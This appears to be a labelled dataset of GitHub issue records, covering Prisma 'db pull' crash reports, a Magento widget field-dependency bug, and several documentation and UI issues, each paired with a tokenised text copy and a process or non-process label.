Error: [libs/datamodel/schema-ast/src/reformat.rs:49:18] internal error: entered unreachable code: Encountered impossible declaration during formatting: Pair { rule: type_alias, span: Span { str: "type TemplatesWorkflowBlocksPreviewCgFyYw1LdGVycy50CmlnZ2VyRxZlbnQ=Children", start: 84223, end: 84298 }, inner: [Pair { rule: TYPE_KEYWORD, span: Span { str: "type", start: 84223, end: 84227 }, inner: [] }, Pair { rule: identifier, span: Span { str: "TemplatesWorkflowBlocksPreviewCgFyYw1LdGVycy50CmlnZ2VyRxZlbnQ", start: 84228, end: 84289 }, inner: [] }, Pair { rule: base_type, span: Span { str: "Children", start: 84290, end: 84298 }, inner: [Pair { rule: identifier, span: Span { str: "Children", start: 84290, end: 84298 }, inner: [] }] }] }
at ChildProcess.<anonymous> (/node_modules/prisma/build/index.js:91978:28)
at ChildProcess.emit (events.js:400:28)
at Process.ChildProcess._handle.onexit (internal/child_process.js:282:12)
```
Rust Stacktrace:
```
0: user_facing_errors::Error::new_in_panic_hook
1: user_facing_errors::panic_hook::set_panic_hook::{{closure}}
2: std::panicking::rust_panic_with_hook
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/std/src/panicking.rs:702:17
3: std::panicking::begin_panic_handler::{{closure}}
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/std/src/panicking.rs:588:13
4: std::sys_common::backtrace::__rust_end_short_backtrace
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/std/src/sys_common/backtrace.rs:138:18
5: rust_begin_unwind
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/std/src/panicking.rs:584:5
6: core::panicking::panic_fmt
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/core/src/panicking.rs:142:14
7: schema_ast::reformat::unreachable
8: schema_ast::reformat::reformat
9: datamodel::reformat::reformat
10: datamodel::render_datamodel_and_config_to_string
11: <core::future::from_generator::GenFuture<T> as core::future::future::Future>::poll
12: <futures_util::future::either::Either<A,B> as core::future::future::Future>::poll
13: <futures_util::future::future::Then<Fut1,Fut2,F> as core::future::future::Future>::poll
14: <futures_util::future::either::Either<A,B> as core::future::future::Future>::poll
15: tokio::runtime::task::harness::poll_future
16: tokio::runtime::task::raw::poll
17: std::thread::local::LocalKey<T>::with
18: tokio::runtime::thread_pool::worker::Context::run_task
19: tokio::runtime::thread_pool::worker::Context::run
20: tokio::macros::scoped_tls::ScopedKey<T>::set
21: tokio::runtime::thread_pool::worker::run
22: <tokio::runtime::blocking::task::BlockingTask<T> as core::future::future::Future>::poll
23: tokio::runtime::task::harness::Harness<T,S>::poll
24: tokio::runtime::blocking::pool::Inner::run
25: std::sys_common::backtrace::__rust_begin_short_backtrace
26: core::ops::function::FnOnce::call_once{{vtable.shim}}
27: <alloc::boxed::Box<F,A> as core::ops::function::FnOnce<Args>>::call_once
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/alloc/src/boxed.rs:1872:9
<alloc::boxed::Box<F,A> as core::ops::function::FnOnce<Args>>::call_once
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/alloc/src/boxed.rs:1872:9
std::sys::unix::thread::Thread::new::thread_start
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/std/src/sys/unix/thread.rs:108:17
28: <unknown>
29: __clone
```
| 1.0 | Reformat unreachable code: Encountered impossible declaration during formatting: Pair { rule: type_alias, span: Span { str: "type TemplatesWorkflowBlocksPreviewCgFyYw1LdGVycy50CmlnZ2VyRxZlbnQ=Children", start: 84223, end: 84298 }, inner: [Pair { rule: TYPE_KEYWORD, span: Span { str: "type", start: 84223, end: 84227 }, inner: [] }, Pair { rule: identifier, span: Span { str: "TemplatesWorkflowBlocksPreviewCgFyYw1LdGVycy50CmlnZ2VyRxZlbnQ", start: 84228, end: 84289 }, inner: [] }, Pair { rule: base_type, span: Span { str: "Children", start: 84290, end: 84298 }, inner: [Pair { rule: identifier, span: Span { str: "Children", start: 84290, end: 84298 }, inner: [] }] }] } - <!-- If required, please update the title to be clear and descriptive -->
Command: `prisma db pull`
Version: `4.3.0`
Binary Version: `c875e43600dfe042452e0b868f7a48b817b9640b`
Report: https://prisma-errors.netlify.app/report/14273
OS: `x64 linux 4.4.0-22621-Microsoft`
JS Stacktrace:
```
Error: [libs/datamodel/schema-ast/src/reformat.rs:49:18] internal error: entered unreachable code: Encountered impossible declaration during formatting: Pair { rule: type_alias, span: Span { str: "type TemplatesWorkflowBlocksPreviewCgFyYw1LdGVycy50CmlnZ2VyRxZlbnQ=Children", start: 84223, end: 84298 }, inner: [Pair { rule: TYPE_KEYWORD, span: Span { str: "type", start: 84223, end: 84227 }, inner: [] }, Pair { rule: identifier, span: Span { str: "TemplatesWorkflowBlocksPreviewCgFyYw1LdGVycy50CmlnZ2VyRxZlbnQ", start: 84228, end: 84289 }, inner: [] }, Pair { rule: base_type, span: Span { str: "Children", start: 84290, end: 84298 }, inner: [Pair { rule: identifier, span: Span { str: "Children", start: 84290, end: 84298 }, inner: [] }] }] }
at ChildProcess.<anonymous> (/node_modules/prisma/build/index.js:91978:28)
at ChildProcess.emit (events.js:400:28)
at Process.ChildProcess._handle.onexit (internal/child_process.js:282:12)
```
Rust Stacktrace:
```
0: user_facing_errors::Error::new_in_panic_hook
1: user_facing_errors::panic_hook::set_panic_hook::{{closure}}
2: std::panicking::rust_panic_with_hook
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/std/src/panicking.rs:702:17
3: std::panicking::begin_panic_handler::{{closure}}
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/std/src/panicking.rs:588:13
4: std::sys_common::backtrace::__rust_end_short_backtrace
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/std/src/sys_common/backtrace.rs:138:18
5: rust_begin_unwind
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/std/src/panicking.rs:584:5
6: core::panicking::panic_fmt
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/core/src/panicking.rs:142:14
7: schema_ast::reformat::unreachable
8: schema_ast::reformat::reformat
9: datamodel::reformat::reformat
10: datamodel::render_datamodel_and_config_to_string
11: <core::future::from_generator::GenFuture<T> as core::future::future::Future>::poll
12: <futures_util::future::either::Either<A,B> as core::future::future::Future>::poll
13: <futures_util::future::future::Then<Fut1,Fut2,F> as core::future::future::Future>::poll
14: <futures_util::future::either::Either<A,B> as core::future::future::Future>::poll
15: tokio::runtime::task::harness::poll_future
16: tokio::runtime::task::raw::poll
17: std::thread::local::LocalKey<T>::with
18: tokio::runtime::thread_pool::worker::Context::run_task
19: tokio::runtime::thread_pool::worker::Context::run
20: tokio::macros::scoped_tls::ScopedKey<T>::set
21: tokio::runtime::thread_pool::worker::run
22: <tokio::runtime::blocking::task::BlockingTask<T> as core::future::future::Future>::poll
23: tokio::runtime::task::harness::Harness<T,S>::poll
24: tokio::runtime::blocking::pool::Inner::run
25: std::sys_common::backtrace::__rust_begin_short_backtrace
26: core::ops::function::FnOnce::call_once{{vtable.shim}}
27: <alloc::boxed::Box<F,A> as core::ops::function::FnOnce<Args>>::call_once
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/alloc/src/boxed.rs:1872:9
<alloc::boxed::Box<F,A> as core::ops::function::FnOnce<Args>>::call_once
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/alloc/src/boxed.rs:1872:9
std::sys::unix::thread::Thread::new::thread_start
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/std/src/sys/unix/thread.rs:108:17
28: <unknown>
29: __clone
```
| process | reformat unreachable code encountered impossible declaration during formatting pair rule type alias span span str type children start end inner pair rule identifier span span str start end inner pair rule base type span span str children start end inner command prisma db pull version binary version report os linux microsoft js stacktrace error internal error entered unreachable code encountered impossible declaration during formatting pair rule type alias span span str type children start end inner pair rule identifier span span str start end inner pair rule base type span span str children start end inner at childprocess node modules prisma build index js at childprocess emit events js at process childprocess handle onexit internal child process js rust stacktrace user facing errors error new in panic hook user facing errors panic hook set panic hook closure std panicking rust panic with hook at rustc library std src panicking rs std panicking begin panic handler closure at rustc library std src panicking rs std sys common backtrace rust end short backtrace at rustc library std src sys common backtrace rs rust begin unwind at rustc library std src panicking rs core panicking panic fmt at rustc library core src panicking rs schema ast reformat unreachable schema ast reformat reformat datamodel reformat reformat datamodel render datamodel and config to string as core future future future poll as core future future future poll as core future future future poll as core future future future poll tokio runtime task harness poll future tokio runtime task raw poll std thread local localkey with tokio runtime thread pool worker context run task tokio runtime thread pool worker context run tokio macros scoped tls scopedkey set tokio runtime thread pool worker run as core future future future poll tokio runtime task harness harness poll tokio runtime blocking pool inner run std sys common backtrace rust begin short backtrace core ops function fnonce call once vtable shim as core ops function fnonce call once at rustc library alloc src boxed rs as core ops function fnonce call once at rustc library alloc src boxed rs std sys unix thread thread new thread start at rustc library std src sys unix thread rs clone | 1 |
484,902 | 13,958,816,944 | IssuesEvent | 2020-10-24 13:46:00 | magento/magento2 | https://api.github.com/repos/magento/magento2 | closed | Widget field depends with type block KO | Component: Cms Component: Widget Fixed in 2.4.x Issue: Clear Description Issue: Confirmed Issue: Format is valid Issue: Ready for Work Priority: P2 Progress: ready for dev Reproduced on 2.1.x Reproduced on 2.2.x Reproduced on 2.3.x Reproduced on 2.4.x Severity: S2 Triage: Dev.Experience | <!--- Provide a general summary of the issue in the Title above -->
<!--- Before adding new issues, please, check this article https://github.com/magento/magento2/wiki/Issue-reporting-guidelines-->
### Preconditions
<!--- Provide a more detailed information of environment you use -->
<!--- Magento version, tag, HEAD, etc., PHP & MySQL version, etc.. -->
1. Magento 2.4-develop
2. PHP 7, MySQL: ANY
### Steps to reproduce
<!--- Provide a set of unambiguous steps to reproduce this bug include code, if relevant -->
1. Create a custom widget with widget.xml file
2. Create a select option chooser
```xml
<parameter name="test_select" xsi:type="select" visible="true" required="true" sort_order="10">
<label translate="true">Select</label>
<options>
<option name="val_1" value="val_1" selected="true">
<label translate="true">Value 1</label>
</option>
<option name="val_2" value="val_2">
<label translate="true">Value 2</label>
</option>
</options>
</parameter>
```
3. Create a CMS block Chooser that needs the second option selected
```xml
<parameter name="block_2_id" xsi:type="block" visible="true" required="true" sort_order="30">
<label translate="true">Block 2</label>
<depends>
<parameter name="test_select" value="val_2" />
</depends>
<block class="Magento\Cms\Block\Adminhtml\Block\Widget\Chooser">
<data>
<item name="button" xsi:type="array">
<item name="open" xsi:type="string" translate="true">Select Block...</item>
</item>
</data>
</block>
</parameter>
```
### Expected result
<!--- Tell us what should happen -->
1. When I select the Val 1, CMS Chooser is not visible
2. When I select the Val 2, CMS Chooser is visible
### Actual result
<!--- Tell us what happens instead -->
1. When I select the Val 1, CMS Chooser is visible
2. When I select the Val 2, CMS Chooser is visible
I checked: **/lib/web/mage/adminhtml/form.js**
In trackChange function, I add log after getting target row: `console.log(idTo);` (line 450 ~)
It tries to get item "options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id" but this selector doesn't exists! If I try $('options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id') I get NULL.
Generated HTML for CMS chooser is:
```html
<div class="admin__field field field-options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id with-addon required _required with-note"
data-ui-id="widget-instance-edit-tab-properties-fieldset-element-form-field-options-fieldset61f7a8d3475b5def75f144b49f5d69a9-block-2-id">
<label class="label admin__field-label" for="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id"
data-ui-id="widget-instance-edit-tab-properties-fieldset-element-label-parameters-block-2-id-label"><span>Block 2</span></label>
<div class="admin__field-control control">
<div class="admin__field">
<div class="control-value"></div>
<label class="widget-option-label"
id="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_ided82f16acfe32d39acd5b9f1d94c5fc2label">Onepage
Success</label>
<div id="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_ided82f16acfe32d39acd5b9f1d94c5fc2advice-container"
class="hidden"></div>
</div>
<div class="note admin__field-note" id="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id-note"></div>
</div>
</div>
<div class="admin__field field field-chooseroptions_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id with-addon"
data-ui-id="widget-instance-edit-tab-properties-fieldset-element-form-field-chooseroptions-fieldset61f7a8d3475b5def75f144b49f5d69a9-block-2-id">
<label class="label admin__field-label" for="chooseroptions_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id"
data-ui-id="widget-instance-edit-tab-properties-fieldset-element-note-label"><span></span></label>
<div class="admin__field-control control">
<div class="admin__field">
<div id="chooseroptions_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id"
class="control-value admin__field-value"></div>
<input id="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_ided82f16acfe32d39acd5b9f1d94c5fc2value"
name="parameters[block_2_id]"
data-ui-id="widget-instance-edit-tab-properties-element-hidden-parameters-block-2-id" value="2"
class="widget-option required-entry" type="hidden">
<button id="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_ided82f16acfe32d39acd5b9f1d94c5fc2control"
title="Select Block..." type="button" class="action-default scalable btn-chooser"
onclick="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_ided82f16acfe32d39acd5b9f1d94c5fc2.choose()"
data-ui-id="widget-button-9">
<span>Select Block...</span>
</button>
</div>
</div>
</div>
```
<!--- (This may be platform independent comment) -->
Thanks for your help! It seems to be a bug with widget chooser (like CMS block) and depends! | 1.0 | Widget field depends with type block KO - <!--- Provide a general summary of the issue in the Title above -->
<!--- Before adding new issues, please, check this article https://github.com/magento/magento2/wiki/Issue-reporting-guidelines-->
### Preconditions
<!--- Provide a more detailed information of environment you use -->
<!--- Magento version, tag, HEAD, etc., PHP & MySQL version, etc.. -->
1. Magento 2.4-develop
2. PHP 7, MySQL: ANY
### Steps to reproduce
<!--- Provide a set of unambiguous steps to reproduce this bug include code, if relevant -->
1. Create a custom widget with widget.xml file
2. Create a select option chooser
```xml
<parameter name="test_select" xsi:type="select" visible="true" required="true" sort_order="10">
<label translate="true">Select</label>
<options>
<option name="val_1" value="val_1" selected="true">
<label translate="true">Value 1</label>
</option>
<option name="val_2" value="val_2">
<label translate="true">Value 2</label>
</option>
</options>
</parameter>
```
3. Create a CMS block Chooser that needs the second option selected
```xml
<parameter name="block_2_id" xsi:type="block" visible="true" required="true" sort_order="30">
<label translate="true">Block 2</label>
<depends>
<parameter name="test_select" value="val_2" />
</depends>
<block class="Magento\Cms\Block\Adminhtml\Block\Widget\Chooser">
<data>
<item name="button" xsi:type="array">
<item name="open" xsi:type="string" translate="true">Select Block...</item>
</item>
</data>
</block>
</parameter>
```
### Expected result
<!--- Tell us what should happen -->
1. When I select the Val 1, CMS Chooser is not visible
2. When I select the Val 2, CMS Chooser is visible
### Actual result
<!--- Tell us what happens instead -->
1. When I select the Val 1, CMS Chooser is visible
2. When I select the Val 2, CMS Chooser is visible
I checked: **/lib/web/mage/adminhtml/form.js**
In trackChange function, I add log after getting target row: `console.log(idTo);` (line 450 ~)
It tries to get item "options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id" but this selector doesn't exists! If I try $('options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id') I get NULL.
Generated HTML for CMS chooser is:
```html
<div class="admin__field field field-options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id with-addon required _required with-note"
data-ui-id="widget-instance-edit-tab-properties-fieldset-element-form-field-options-fieldset61f7a8d3475b5def75f144b49f5d69a9-block-2-id">
<label class="label admin__field-label" for="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id"
data-ui-id="widget-instance-edit-tab-properties-fieldset-element-label-parameters-block-2-id-label"><span>Block 2</span></label>
<div class="admin__field-control control">
<div class="admin__field">
<div class="control-value"></div>
<label class="widget-option-label"
id="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_ided82f16acfe32d39acd5b9f1d94c5fc2label">Onepage
Success</label>
<div id="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_ided82f16acfe32d39acd5b9f1d94c5fc2advice-container"
class="hidden"></div>
</div>
<div class="note admin__field-note" id="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id-note"></div>
</div>
</div>
<div class="admin__field field field-chooseroptions_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id with-addon"
data-ui-id="widget-instance-edit-tab-properties-fieldset-element-form-field-chooseroptions-fieldset61f7a8d3475b5def75f144b49f5d69a9-block-2-id">
<label class="label admin__field-label" for="chooseroptions_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id"
data-ui-id="widget-instance-edit-tab-properties-fieldset-element-note-label"><span></span></label>
<div class="admin__field-control control">
<div class="admin__field">
<div id="chooseroptions_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id"
class="control-value admin__field-value"></div>
<input id="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_ided82f16acfe32d39acd5b9f1d94c5fc2value"
name="parameters[block_2_id]"
data-ui-id="widget-instance-edit-tab-properties-element-hidden-parameters-block-2-id" value="2"
class="widget-option required-entry" type="hidden">
<button id="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_ided82f16acfe32d39acd5b9f1d94c5fc2control"
title="Select Block..." type="button" class="action-default scalable btn-chooser"
onclick="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_ided82f16acfe32d39acd5b9f1d94c5fc2.choose()"
data-ui-id="widget-button-9">
<span>Select Block...</span>
</button>
</div>
</div>
</div>
```
<!--- (This may be platform independent comment) -->
Thanks for your help! It seems to be a bug with widget chooser (like CMS block) and depends! | non_process | widget field depends with type block ko before adding new issues please check this article preconditions magento develop php mysql any steps to reproduce create a custom widget with widget xml file create a select option chooser xml select value value create a cms block chooser that needs the second option selected xml block select block expected result when i select the val cms chooser is not visible when i select the val cms chooser is visible actual result when i select the val cms chooser is visible when i select the val cms chooser is visible i checked lib web mage adminhtml form js in trackchange function i add log after getting target row console log idto line it tries to get item options block id but this selector doesn t exists if i try options block id i get null generated html for cms chooser is html div class admin field field field options block id with addon required required with note data ui id widget instance edit tab properties fieldset element form field options block id label class label admin field label for options block id data ui id widget instance edit tab properties fieldset element label parameters block id label block label class widget option label id options block onepage success div id options block container class hidden div class admin field field field chooseroptions block id with addon data ui id widget instance edit tab properties fieldset element form field chooseroptions block id label class label admin field label for chooseroptions block id data ui id widget instance edit tab properties fieldset element note label div id chooseroptions block id class control value admin field value input id options block name parameters data ui id widget instance edit tab properties element hidden parameters block id value class widget option required entry type hidden button id options block title select block type button class action default scalable btn chooser onclick options block choose data ui id widget button select block thanks for your help it seems to be a bug with widget chooser like cms block and depends | 0 |
123,070 | 12,191,204,077 | IssuesEvent | 2020-04-29 10:41:27 | galasa-dev/projectmanagement | https://api.github.com/repos/galasa-dev/projectmanagement | closed | Explain why ~/.galasa/overrides.properties needs editing | SimBank SimPlatform bug documentation | In the docs in galasa.dev - on the _Getting started -> Installing the Galasa Eclipse plug-in_ in the section _Configuring Eclipse for Galasa_
A user (even me) can install the _Eclipse plugin_ by following the instructions but it is significant that the _Setup Galasa Workspace_ creates an 'empty' (even though it's not empty) overrides.properties file and then the next step is to populate it with some given content (a superset of what's in the 'empty' version)
My first question to Will was, "why not just pre-populate it with the correct content?".
Will's response, "To show that this is what is binding the test to the simbank instance".
In which case, the docs should explain the reasoning otherwise no one will know!
| 1.0 | Explain why ~/.galasa/overrides.properties needs editing - In the docs in galasa.dev - on the _Getting started -> Installing the Galasa Eclipse plug-in_ in the section _Configuring Eclipse for Galasa_
A user (even me) can install the _Eclipse plugin_ by following the instructions but it is significant that the _Setup Galasa Workspace_ creates an 'empty' (even though it's not empty) overrides.properties file and then the next step is to populate it with some given content (a superset of what's in the 'empty' version)
My first question to Will was, "why not just pre-populate it with the correct content?".
Will's response, "To show that this is what is binding the test to the simbank instance".
In which case, the docs should explain the reasoning otherwise no one will know!
| non_process | explain why galasa overrides properties needs editing in the docs in galasa dev on the getting started installing the galasa eclipse plug in in the section configuring eclipse for galasa a user even me can install the eclipse plugin by following the instructions but it is significant that the setup galasa workspace creates an empty even though it s not empty overrides properties file and then the next step is to populate it with some given content a superset of what s in the empty version my first question to will was why not just pre populate it with the correct content will s response to show that this is what is binding the test to the simbank instance in which case the docs should explain the reasoning otherwise no one will know | 0 |
6,295 | 9,301,916,492 | IssuesEvent | 2019-03-24 03:31:45 | vtloc/grokking-links | https://api.github.com/repos/vtloc/grokking-links | closed | Full Cycle Developers at Netflix — Operate What You Build | Company-Netflix Software Engineering Management Software Engineering Process | Với sự phát triển của DevOps và SRE (Site Reliability Engineering), nhiều công ty đã quyết định tách riêng vai trò DevOps và SRE ra thành các vai trò độc lập.
Tuy nhiên ở Netflix, quá trình lại diễn ra ngược lại. Từ chỗ có những thành viên phụ trách riêng mảng DevOps, SRE, các developer trong team Netflix giờ sẽ cần trở nên Full-Cycle, tức là phải lo luôn các khâu Deploy, Operate, Support, ...
Cách làm này sẽ mang lại hiệu quả gì?
https://medium.com/netflix-techblog/full-cycle-developers-at-netflix-a08c31f83249 | 1.0 | Full Cycle Developers at Netflix — Operate What You Build - Với sự phát triển của DevOps và SRE (Site Reliability Engineering), nhiều công ty đã quyết định tách riêng vai trò DevOps và SRE ra thành các vai trò độc lập.
Tuy nhiên ở Netflix, quá trình lại diễn ra ngược lại. Từ chỗ có những thành viên phụ trách riêng mảng DevOps, SRE, các developer trong team Netflix giờ sẽ cần trở nên Full-Cycle, tức là phải lo luôn các khâu Deploy, Operate, Support, ...
Cách làm này sẽ mang lại hiệu quả gì?
https://medium.com/netflix-techblog/full-cycle-developers-at-netflix-a08c31f83249 | process | full cycle developers at netflix — operate what you build với sự phát triển của devops và sre site reliability engineering nhiều công ty đã quyết định tách riêng vai trò devops và sre ra thành các vai trò độc lập tuy nhiên ở netflix quá trình lại diễn ra ngược lại từ chỗ có những thành viên phụ trách riêng mảng devops sre các developer trong team netflix giờ sẽ cần trở nên full cycle tức là phải lo luôn các khâu deploy operate support cách làm này sẽ mang lại hiệu quả gì | 1 |
482,823 | 13,914,023,563 | IssuesEvent | 2020-10-20 21:24:06 | CERT-Polska/drakvuf-sandbox | https://api.github.com/repos/CERT-Polska/drakvuf-sandbox | closed | Analysis list works poorly when there are lots of analyses | bug certpl drakcore/gui priority:medium | * Implement infinite scroll in AnalysisList view?
* The `/list` endpoint in `drak-web` backend should return limited amount of entries at time and these should be somehow sorted according to creation time. | 1.0 | Analysis list works poorly when there are lots of analyses - * Implement infinite scroll in AnalysisList view?
* The `/list` endpoint in `drak-web` backend should return limited amount of entries at time and these should be somehow sorted according to creation time. | non_process | analysis list works poorly when there are lots of analyses implement infinite scroll in analysislist view the list endpoint in drak web backend should return limited amount of entries at time and these should be somehow sorted according to creation time | 0 |
12,435 | 14,930,887,640 | IssuesEvent | 2021-01-25 04:17:33 | lishu/vscode-svg2 | https://api.github.com/repos/lishu/vscode-svg2 | closed | Controls are very small | In process | 
The title in the tab has a normal size which is very readable. The elements inside the webview however are rather small (at least on a 1440p monitor). | 1.0 | Controls are very small - 
The title in the tab has a normal size which is very readable. The elements inside the webview however are rather small (at least on a 1440p monitor). | process | controls are very small the title in the tab has a normal size which is very readable the elements inside the webview however are rather small at least on a monitor | 1 |
6,899 | 10,043,888,418 | IssuesEvent | 2019-07-19 08:41:16 | symfony/symfony-docs | https://api.github.com/repos/symfony/symfony-docs | closed | Add docs for: [Process] Deprecate Process::inheritEnvironmentVariable.. | Process | | Q | A
| ------------ | ---
| Feature PR | symfony/symfony#32475
| PR author(s) | @ogizanagi | 1.0 | Add docs for: [Process] Deprecate Process::inheritEnvironmentVariable.. - | Q | A
| ------------ | ---
| Feature PR | symfony/symfony#32475
| PR author(s) | @ogizanagi | process | add docs for deprecate process inheritenvironmentvariable q a feature pr symfony symfony pr author s ogizanagi | 1 |
16,578 | 21,608,649,391 | IssuesEvent | 2022-05-04 07:44:58 | prisma/prisma | https://api.github.com/repos/prisma/prisma | closed | Error: [introspection-engine/connectors/mongodb-introspection-connector/src/sampler/statistics/indices.rs:167:71] called `Option::unwrap()` on a `None` value | bug/1-unconfirmed kind/bug process/candidate tech/engines/introspection engine topic: error reporting team/schema topic: prisma db pull topic: mongodb | <!-- If required, please update the title to be clear and descriptive -->
Command: `prisma db pull`
Version: `3.12.0`
Binary Version: `22b822189f46ef0dc5c5b503368d1bee01213980`
Report: https://prisma-errors.netlify.app/report/13785
OS: `arm64 darwin 21.3.0`
JS Stacktrace:
```
Error: [introspection-engine/connectors/mongodb-introspection-connector/src/sampler/statistics/indices.rs:167:71] called `Option::unwrap()` on a `None` value
at ChildProcess.<anonymous> (node_modules/prisma/build/index.js:51878:30)
at ChildProcess.emit (node:events:390:28)
at Process.ChildProcess._handle.onexit (node:internal/child_process:290:12)
```
Rust Stacktrace:
```
0: backtrace::backtrace::trace
1: backtrace::capture::Backtrace::new
2: user_facing_errors::Error::new_in_panic_hook
3: user_facing_errors::panic_hook::set_panic_hook::{{closure}}
4: std::panicking::rust_panic_with_hook
5: std::panicking::begin_panic_handler::{{closure}}
6: std::sys_common::backtrace::__rust_end_short_backtrace
7: _rust_begin_unwind
8: core::panicking::panic_fmt
9: core::panicking::panic
10: mongodb_introspection_connector::sampler::statistics::indices::add_to_models
11: mongodb_introspection_connector::sampler::statistics::Statistics::into_datamodel
12: <core::future::from_generator::GenFuture<T> as core::future::future::Future>::poll
13: <core::future::from_generator::GenFuture<T> as core::future::future::Future>::poll
14: <futures_util::future::either::Either<A,B> as core::future::future::Future>::poll
15: <futures_util::future::future::Then<Fut1,Fut2,F> as core::future::future::Future>::poll
16: tokio::runtime::task::harness::poll_future
17: tokio::runtime::task::raw::poll
18: std::thread::local::LocalKey<T>::with
19: tokio::runtime::thread_pool::worker::Context::run_task
20: tokio::runtime::thread_pool::worker::Context::run
21: tokio::macros::scoped_tls::ScopedKey<T>::set
22: tokio::runtime::thread_pool::worker::run
23: <tokio::runtime::blocking::task::BlockingTask<T> as core::future::future::Future>::poll
24: tokio::runtime::task::harness::Harness<T,S>::poll
25: tokio::runtime::blocking::pool::Inner::run
26: std::sys_common::backtrace::__rust_begin_short_backtrace
27: core::ops::function::FnOnce::call_once{{vtable.shim}}
28: std::sys::unix::thread::Thread::new::thread_start
29: __pthread_deallocate
```
| 1.0 | Error: [introspection-engine/connectors/mongodb-introspection-connector/src/sampler/statistics/indices.rs:167:71] called `Option::unwrap()` on a `None` value - <!-- If required, please update the title to be clear and descriptive -->
Command: `prisma db pull`
Version: `3.12.0`
Binary Version: `22b822189f46ef0dc5c5b503368d1bee01213980`
Report: https://prisma-errors.netlify.app/report/13785
OS: `arm64 darwin 21.3.0`
JS Stacktrace:
```
Error: [introspection-engine/connectors/mongodb-introspection-connector/src/sampler/statistics/indices.rs:167:71] called `Option::unwrap()` on a `None` value
at ChildProcess.<anonymous> (node_modules/prisma/build/index.js:51878:30)
at ChildProcess.emit (node:events:390:28)
at Process.ChildProcess._handle.onexit (node:internal/child_process:290:12)
```
Rust Stacktrace:
```
0: backtrace::backtrace::trace
1: backtrace::capture::Backtrace::new
2: user_facing_errors::Error::new_in_panic_hook
3: user_facing_errors::panic_hook::set_panic_hook::{{closure}}
4: std::panicking::rust_panic_with_hook
5: std::panicking::begin_panic_handler::{{closure}}
6: std::sys_common::backtrace::__rust_end_short_backtrace
7: _rust_begin_unwind
8: core::panicking::panic_fmt
9: core::panicking::panic
10: mongodb_introspection_connector::sampler::statistics::indices::add_to_models
11: mongodb_introspection_connector::sampler::statistics::Statistics::into_datamodel
12: <core::future::from_generator::GenFuture<T> as core::future::future::Future>::poll
13: <core::future::from_generator::GenFuture<T> as core::future::future::Future>::poll
14: <futures_util::future::either::Either<A,B> as core::future::future::Future>::poll
15: <futures_util::future::future::Then<Fut1,Fut2,F> as core::future::future::Future>::poll
16: tokio::runtime::task::harness::poll_future
17: tokio::runtime::task::raw::poll
18: std::thread::local::LocalKey<T>::with
19: tokio::runtime::thread_pool::worker::Context::run_task
20: tokio::runtime::thread_pool::worker::Context::run
21: tokio::macros::scoped_tls::ScopedKey<T>::set
22: tokio::runtime::thread_pool::worker::run
23: <tokio::runtime::blocking::task::BlockingTask<T> as core::future::future::Future>::poll
24: tokio::runtime::task::harness::Harness<T,S>::poll
25: tokio::runtime::blocking::pool::Inner::run
26: std::sys_common::backtrace::__rust_begin_short_backtrace
27: core::ops::function::FnOnce::call_once{{vtable.shim}}
28: std::sys::unix::thread::Thread::new::thread_start
29: __pthread_deallocate
```
| process | error called option unwrap on a none value command prisma db pull version binary version report os darwin js stacktrace error called option unwrap on a none value at childprocess node modules prisma build index js at childprocess emit node events at process childprocess handle onexit node internal child process rust stacktrace backtrace backtrace trace backtrace capture backtrace new user facing errors error new in panic hook user facing errors panic hook set panic hook closure std panicking rust panic with hook std panicking begin panic handler closure std sys common backtrace rust end short backtrace rust begin unwind core panicking panic fmt core panicking panic mongodb introspection connector sampler statistics indices add to models mongodb introspection connector sampler statistics statistics into datamodel as core future future future poll as core future future future poll as core future future future poll as core future future future poll tokio runtime task harness poll future tokio runtime task raw poll std thread local localkey with tokio runtime thread pool worker context run task tokio runtime thread pool worker context run tokio macros scoped tls scopedkey set tokio runtime thread pool worker run as core future future future poll tokio runtime task harness harness poll tokio runtime blocking pool inner run std sys common backtrace rust begin short backtrace core ops function fnonce call once vtable shim std sys unix thread thread new thread start pthread deallocate | 1 |
